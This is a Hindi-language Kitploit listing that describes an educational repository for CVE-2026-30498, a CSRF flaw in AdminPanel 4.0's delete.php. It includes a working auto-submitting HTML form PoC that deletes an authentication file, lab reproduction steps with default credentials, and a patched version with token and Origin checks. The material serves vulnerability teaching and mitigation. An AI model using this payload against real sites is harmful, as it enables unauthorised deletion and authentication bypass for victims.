Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-30498 — शैक्षिक CSRF भेद्यता प्रदर्शन, एक नियंत्रित प्रयोगशाला वातावरण के साथ, जिसमें proof-of-concept एक्सप्लॉइट और उचित CSRF सुरक्षा वाला एक सुधारित संस्करण शामिल है। | Kitploit
उपकरण/GitHubGitHub/mehdi-ben-hamou/cve-2026-30498
भेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubmehdi-ben-hamou/cve-2026-30498

CVE-2026-30498

शैक्षिक CSRF भेद्यता प्रदर्शन, एक नियंत्रित प्रयोगशाला वातावरण के साथ, जिसमें proof-of-concept एक्सप्लॉइट और उचित CSRF सुरक्षा वाला एक सुधारित संस्करण शामिल है।

रिपॉजिटरी देखें
15 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-30498 – CSRF भेद्यता (AdminPanel 4.0)


अवलोकन

CVE ID: CVE-2026-30498 (MITRE द्वारा आरक्षित)
खोजकर्ता: मेहदी बेन हमौ

AdminPanel 4.0 के delete.php एंडपॉइंट में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता मौजूद है।

यह भेद्यता एक हमलावर को प्रमाणित उपयोगकर्ता की सहमति के बिना उसकी ओर से संवेदनशील क्रियाएं (फ़ाइल विलोपन) करने की अनुमति देती है।


तकनीकी विवरण

यह भेद्यता CSRF सुरक्षा की अनुपस्थिति के कारण होती है:

  • कोई CSRF टोकन सत्यापन नहीं
  • कोई Origin / Referer सत्यापन नहीं
  • संवेदनशील क्रिया GET अनुरोध के माध्यम से उजागर
  • उपयोगकर्ता की मंशा का कोई सत्यापन नहीं

कमजोर एंडपॉइंट अनुरोध के स्रोत को सत्यापित किए बिना सीधे उपयोगकर्ता सत्र के आधार पर अनुरोधों को संसाधित करता है।


प्रभाव

सफल शोषण से निम्नलिखित होता है:

  • verifyPanel.php का विलोपन
  • प्रमाणीकरण बाईपास
  • एप्लिकेशन सेटअप मोड में प्रवेश करता है
  • पूर्ण सिस्टम पुनःआरंभ संभव

प्रभावित संस्करण

  • AdminPanel 4.0 और पूर्व (संग्रहीत परियोजना)

हमले का परिदृश्य

एक हमलावर एक दुर्भावनापूर्ण वेब पेज होस्ट करता है जो एक जाली अनुरोध भेजता है:

root@kitploit:~
http://localhost:8080/delete.php?file=verifyPanel.php

जब कोई पीड़ित (प्रमाणित उपयोगकर्ता) इस पेज पर जाता है, तो ब्राउज़र स्वचालित रूप से सत्र कुकीज़ शामिल करता है, और अनुरोध निष्पादित हो जाता है।


प्रूफ ऑफ कॉन्सेप्ट (PoC)

दुर्भावनापूर्ण पेज (हमलावर)

root@kitploit:~
<form id="csrfForm" action="http://localhost:8080/delete.php" method="GET">
  <input type="hidden" name="file" value="verifyPanel.php">
</form>
<script>
  document.getElementById("csrfForm").submit();
</script>

यह अनुरोध स्वचालित रूप से पीड़ित के सत्र कुकी के साथ भेजा जाता है।


पुनरुत्पादन के चरण

  1. पीड़ित सर्वर प्रारंभ करें:
root@kitploit:~
php -S localhost:8080
  1. लॉगिन पेज तक पहुंचें:
root@kitploit:~
http://localhost:8080
  1. निम्नलिखित से लॉगिन करें:
root@kitploit:~
admin / admin123
  1. हमलावर पेज खोलें:
root@kitploit:~
http://localhost:8081/evil.html
  1. CSRF हमला लॉन्च करें
  2. डैशबोर्ड पर वापस लौटें:
root@kitploit:~
/panel/dashboard.php

आंतरिक रूप से क्या होता है

  1. पीड़ित लॉगिन करता है → सत्र कुकी बनती है
  2. हमलावर पेज जाली अनुरोध भेजता है
  3. ब्राउज़र स्वचालित रूप से कुकी जोड़ता है
  4. सर्वर बिना सत्यापन के विलोपन निष्पादित करता है
  5. सिस्टम लापता प्रमाणीकरण फ़ाइल का पता लगाता है
  6. एप्लिकेशन सेटअप मोड में प्रवेश करता है

प्रयोगशाला वातावरण (शैक्षणिक सिमुलेशन)

इस रिपॉजिटरी में भेद्यता को सुरक्षित रूप से पुनरुत्पादित करने के लिए एक नियंत्रित प्रयोगशाला वातावरण शामिल है।

महत्वपूर्ण: यह प्रयोगशाला एक सिमुलेशन है और यह मूल AdminPanel कोडबेस का सटीक प्रतिनिधित्व नहीं करती है।

प्रयोगशाला रीसेट करें

वातावरण को रीसेट करने के लिए:

root@kitploit:~
/reset.php

सुरक्षित संस्करण (शमन)

एक सुरक्षित संस्करण निम्नलिखित में लागू किया गया है:

root@kitploit:~
delete_fixed.php

जोड़ी गई सुरक्षाएं:

  • ✅ CSRF टोकन सत्यापन
  • ✅ केवल POST विधि
  • ✅ Origin / Referer सत्यापन
  • ✅ सत्र सत्यापन

फिक्स क्यों काम करता है

  • हमलावर CSRF टोकन तक नहीं पहुंच सकता (समान-मूल नीति)
  • जाली अनुरोधों में वैध टोकन नहीं होता → अस्वीकृत
  • Origin जांच के माध्यम से क्रॉस-ओरिजिन अनुरोध अवरुद्ध

परियोजना संरचना

root@kitploit:~
victim/
├── index.php
├── delete.php
├── delete_fixed.php
├── reset.php
└── panel/
    └── dashboard.php

attacker/
└── evil.html

अस्वीकरण

यह परियोजना केवल शैक्षिक और शोध उद्देश्यों के लिए है।
उचित प्राधिकरण के बिना इस भेद्यता का उपयोग सिस्टम पर न करें।

टूल डाउनलोड करें